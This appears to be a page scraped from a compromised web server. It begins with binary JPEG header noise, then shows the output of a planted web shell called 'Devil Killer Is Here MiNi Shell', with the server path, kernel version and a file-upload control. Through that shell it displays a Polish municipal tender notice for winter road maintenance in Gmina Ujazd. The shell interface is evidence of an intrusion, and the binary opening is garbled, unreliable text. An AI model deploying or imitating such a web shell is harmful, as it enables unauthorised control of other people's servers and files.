JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211029/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211029/0025123201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> &#34;Zimowe utrzymanie dróg na terenie Gminy Ujazd 2021-2022&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Ujazd</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531413290</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sławięcicka</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ujazd</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">47-143</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">774048757</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">774048763</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@ujazd.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ujazd.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Zimowe utrzymanie dróg na terenie Gminy Ujazd 2021-2022&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f2d619bb-3896-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00251232</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003242/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Zimowe utrzymanie dróg na terenie Gminy Ujazd 2021-2022</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ujazd <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/ujazd</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/ujazd<br/>W uzasadnionych przypadkach np. awarii platformy dopuszczalna jest komunikacja za pośrednictwem<br/>poczty elektronicznej na adresy wskazane poniżej, z zastrzeżeniem, że ofertę składa się tylko za<br/>pośrednictwem platformy.<br/>Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym<br/>wskazaniem na .pdf<br/>W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>.zip; .7Z; Wśród formatów powszechnych a NIE występujących w rozporządzeniu: .rar .gif .bmp<br/>.numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który<br/>wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej<br/>do składania podpisu osobistego, który wynosi max 5MB.<br/>Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu,<br/>zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na<br/>format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES. Pliki w innych formatach niż PDF zaleca<br/>się opatrzyć wewnętrznym podpisem XAdES. Jeśli Wykonawca opatrzy plik zewnętrznym podpisem<br/>powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym.<br/>Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego<br/>samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może<br/>doprowadzić do problemów w weryfikacji plików.<br/>Szczegółowe informacje zawarte są w rozdziale 13 SWZ -INFORMACJE O SPOSOBIE<br/>POROZUMIEWANIA SIĘ ZAMAWIAJĄCEGO Z WYKONAWCAMI</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 oraz art. 15 ust. 1 i 3<br/>Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 roku w<br/>sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (dalej RODO),<br/>obowiązującego od 25 maja 2018. Szczegółowe informacje zawarto w rozdziale 24 SWZ – OCHRONA<br/>DANYCH OSOBOWYCH ZEBRANYCH PRZEZ ZAMAWIAJĄCEGO W TOKU POSTĘPOWANIA</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegółowe informacje zawarto w rozdziale 24 SWZ –<br/>OCHRONA DANYCH OSOBOWYCH ZEBRANYCH PRZEZ ZAMAWIAJĄCEGO W TOKU<br/>POSTĘPOWANIA</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GT.271.7.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są prace polegające na zimowym utrzymaniu dróg na terenie Gminy<br/>Ujazd, zarówno w dni robocze jak też w dni wolne od pracy. Utrzymanie zimowe dróg na terenie<br/>Gminy Ujazd obejmuje usuwanie skutków zimy zmierzających do zwiększenia bezpieczeństwa<br/>ruchu w tym:<br/>1. Odśnieżanie z całej szerokości ulic, dróg asfaltowych, zatok autobusowych i utrzymaniem<br/>stałej przejezdności;<br/>2. Usuwanie śliskości zimowej przy zastosowaniu odpowiednich środków powodujących<br/>szorstkość nawierzchni;<br/>3. Posypanie solą po odgarnięciu śniegu i lodu;<br/>W ramach niniejszego zamówienia wykonawca zobowiązany jest do:<br/>1. Odśnieżania dróg (dróg publicznych oraz wewnętrznych, ulic, zatok autobusowych) na terenie<br/>Gminy Ujazd;<br/>2. Zapobiegania powstawaniu oraz usuwania śliskości przez stosowanie środków<br/>zwiększających przyczepność poprzez poprawę tarcia (sól);<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>3. Wywożenia śniegu w miejsce wskazane przez zamawiającego (w przypadku obfitych<br/>opadów);<br/>4. Zapewnienie całodobowego dyżuru gotowości sprzętu oraz bieżącej kontroli stanu dróg w<br/>ramach „Akcji Zima”<br/>5. Zapewnienie całodobowej stałej łączności telefonicznej z Zamawiającym dla przyjmowania<br/>zgłoszeń od pracownika Zamawiającego –zlecenie potwierdzone SMS lub e-mail oraz<br/>zgłaszanie pracownikowi Zamawiającego sytuacji na drogach;<br/>6. Przy intensywnych, długotrwałych opadach śniegu, silnych wiatrach powodujących powstanie<br/>zawiei i zamieci śnieżnych, należy koncentrować działalność na zapewnieniu przejezdności dróg<br/>o największym znaczeniu komunikacyjnym </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 11232,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium:<br/>1) Wartość brutto– znaczenie 60%;<br/>2) Czas reakcji -znaczenie 40%.<br/>Cena całkowita brutto [zł]<br/>Liczba punktów = (Cmin x 100 x waga) / Cof<br/>gdzie:<br/>- Cmin – najniższa cena spośród wszystkich ofert<br/>- Cof – cena badanej oferty<br/>Czas reakcji [h]<br/>Wykonawca zobowiązany będzie wskazać czas w jakim przystąpi do rozpoczęcia odśnieżania i<br/>usuwania śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora,<br/>przyznawanie punktów poszczególnym ofertom w/w kryterium odbywać się będzie wg następującej<br/>zasady:<br/>w ciągu 1 godziny zegarowej- uzyska 40pkt;<br/>w ciągu 1,5 godziny zegarowej- uzyska 30pkt;<br/>w ciągu 2 godzin zegarowych- uzyska 20pkt;<br/>w ciągu 2,5 godzin zegarowych- uzyska 10pkt;<br/>w ciągu 3 godzin zegarowych- uzyska 0pkt;<br/>Wykonawca może uzyskać maksymalnie 40 pkt, kryterium będzie oceniane na podstawie<br/>oświadczenia złożonego w treści Formularza ofertowego w ramach każdego zadania oddzielnie.<br/>Wykonawca obowiązkowo musi wskazać tylko jeden przedział każdorazowego rozpoczęcia realizacji<br/>przedmiotu zamówienia:<br/>a) Oferta Wykonawcy, który wskaże czas w jakim przystąpi do rozpoczęcia odśnieżania i usuwania<br/>śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora, poniżej 1<br/>godziny zegarowej jego oferta zostanie odrzucona, jako oferta niezgodna z warunkami zamówienia w<br/>ramach zadania na które zaoferował omawiany czas reakcji.<br/>b) Oferta Wykonawcy, który wskaże czas w jakim przystąpi do rozpoczęcia odśnieżania i usuwania<br/>śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora, powyżej 3<br/>godzin zegarowych jego oferta zostanie odrzucona, jako oferta niezgodna z warunkami zamówienia w<br/>ramach zadania na które zaoferował omawiany czas reakcji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są prace polegające na zimowym utrzymaniu dróg na terenie Gminy<br/>Ujazd, zarówno w dni robocze jak też w dni wolne od pracy. Utrzymanie zimowe dróg na terenie<br/>Gminy Ujazd obejmuje usuwanie skutków zimy zmierzających do zwiększenia bezpieczeństwa<br/>ruchu w tym:<br/>1. Odśnieżanie z całej szerokości ulic, dróg asfaltowych, zatok autobusowych i utrzymaniem<br/>stałej przejezdności;<br/>2. Usuwanie śliskości zimowej przy zastosowaniu odpowiednich środków powodujących<br/>szorstkość nawierzchni;<br/>3. Posypanie solą po odgarnięciu śniegu i lodu;<br/>W ramach niniejszego zamówienia wykonawca zobowiązany jest do:<br/>1. Odśnieżania dróg (dróg publicznych oraz wewnętrznych, ulic, zatok autobusowych) na terenie<br/>Gminy Ujazd;<br/>2. Zapobiegania powstawaniu oraz usuwania śliskości przez stosowanie środków<br/>zwiększających przyczepność poprzez poprawę tarcia (sól);<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>3. Wywożenia śniegu w miejsce wskazane przez zamawiającego (w przypadku obfitych<br/>opadów);<br/>4. Zapewnienie całodobowego dyżuru gotowości sprzętu oraz bieżącej kontroli stanu dróg w<br/>ramach „Akcji Zima”<br/>5. Zapewnienie całodobowej stałej łączności telefonicznej z Zamawiającym dla przyjmowania<br/>zgłoszeń od pracownika Zamawiającego –zlecenie potwierdzone SMS lub e-mail oraz<br/>zgłaszanie pracownikowi Zamawiającego sytuacji na drogach;<br/>6. Przy intensywnych, długotrwałych opadach śniegu, silnych wiatrach powodujących powstanie<br/>zawiei i zamieci śnieżnych, należy koncentrować działalność na zapewnieniu przejezdności dróg<br/>o największym znaczeniu komunikacyjnym </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 8424,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium:<br/>1) Wartość brutto– znaczenie 60%;<br/>2) Czas reakcji -znaczenie 40%.<br/>Cena całkowita brutto [zł]<br/>Liczba punktów = (Cmin x 100 x waga) / Cof<br/>gdzie:<br/>- Cmin – najniższa cena spośród wszystkich ofert<br/>- Cof – cena badanej oferty<br/>Czas reakcji [h]<br/>Wykonawca zobowiązany będzie wskazać czas w jakim przystąpi do rozpoczęcia odśnieżania i<br/>usuwania śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora,<br/>przyznawanie punktów poszczególnym ofertom w/w kryterium odbywać się będzie wg następującej<br/>zasady:<br/>w ciągu 1 godziny zegarowej- uzyska 40pkt;<br/>w ciągu 1,5 godziny zegarowej- uzyska 30pkt;<br/>w ciągu 2 godzin zegarowych- uzyska 20pkt;<br/>w ciągu 2,5 godzin zegarowych- uzyska 10pkt;<br/>w ciągu 3 godzin zegarowych- uzyska 0pkt;<br/>Wykonawca może uzyskać maksymalnie 40 pkt, kryterium będzie oceniane na podstawie<br/>oświadczenia złożonego w treści Formularza ofertowego w ramach każdego zadania oddzielnie.<br/>Wykonawca obowiązkowo musi wskazać tylko jeden przedział każdorazowego rozpoczęcia realizacji<br/>przedmiotu zamówienia:<br/>a) Oferta Wykonawcy, który wskaże czas w jakim przystąpi do rozpoczęcia odśnieżania i usuwania<br/>śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora, poniżej 1<br/>godziny zegarowej jego oferta zostanie odrzucona, jako oferta niezgodna z warunkami zamówienia w<br/>ramach zadania na które zaoferował omawiany czas reakcji.<br/>b) Oferta Wykonawcy, który wskaże czas w jakim przystąpi do rozpoczęcia odśnieżania i usuwania<br/>śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora, powyżej 3<br/>godzin zegarowych jego oferta zostanie odrzucona, jako oferta niezgodna z warunkami zamówienia w<br/>ramach zadania na które zaoferował omawiany czas reakcji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są prace polegające na zimowym utrzymaniu dróg na terenie Gminy<br/>Ujazd, zarówno w dni robocze jak też w dni wolne od pracy. Utrzymanie zimowe dróg na terenie<br/>Gminy Ujazd obejmuje usuwanie skutków zimy zmierzających do zwiększenia bezpieczeństwa<br/>ruchu w tym:<br/>1. Odśnieżanie z całej szerokości ulic, dróg asfaltowych, zatok autobusowych i utrzymaniem<br/>stałej przejezdności;<br/>2. Usuwanie śliskości zimowej przy zastosowaniu odpowiednich środków powodujących<br/>szorstkość nawierzchni;<br/>3. Posypanie solą po odgarnięciu śniegu i lodu;<br/>W ramach niniejszego zamówienia wykonawca zobowiązany jest do:<br/>1. Odśnieżania dróg (dróg publicznych oraz wewnętrznych, ulic, zatok autobusowych) na terenie<br/>Gminy Ujazd;<br/>2. Zapobiegania powstawaniu oraz usuwania śliskości przez stosowanie środków<br/>zwiększających przyczepność poprzez poprawę tarcia (sól);<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>3. Wywożenia śniegu w miejsce wskazane przez zamawiającego (w przypadku obfitych<br/>opadów);<br/>4. Zapewnienie całodobowego dyżuru gotowości sprzętu oraz bieżącej kontroli stanu dróg w<br/>ramach „Akcji Zima”<br/>5. Zapewnienie całodobowej stałej łączności telefonicznej z Zamawiającym dla przyjmowania<br/>zgłoszeń od pracownika Zamawiającego –zlecenie potwierdzone SMS lub e-mail oraz<br/>zgłaszanie pracownikowi Zamawiającego sytuacji na drogach;<br/>6. Przy intensywnych, długotrwałych opadach śniegu, silnych wiatrach powodujących powstanie<br/>zawiei i zamieci śnieżnych, należy koncentrować działalność na zapewnieniu przejezdności dróg<br/>o największym znaczeniu komunikacyjnym </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 3369,60 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> 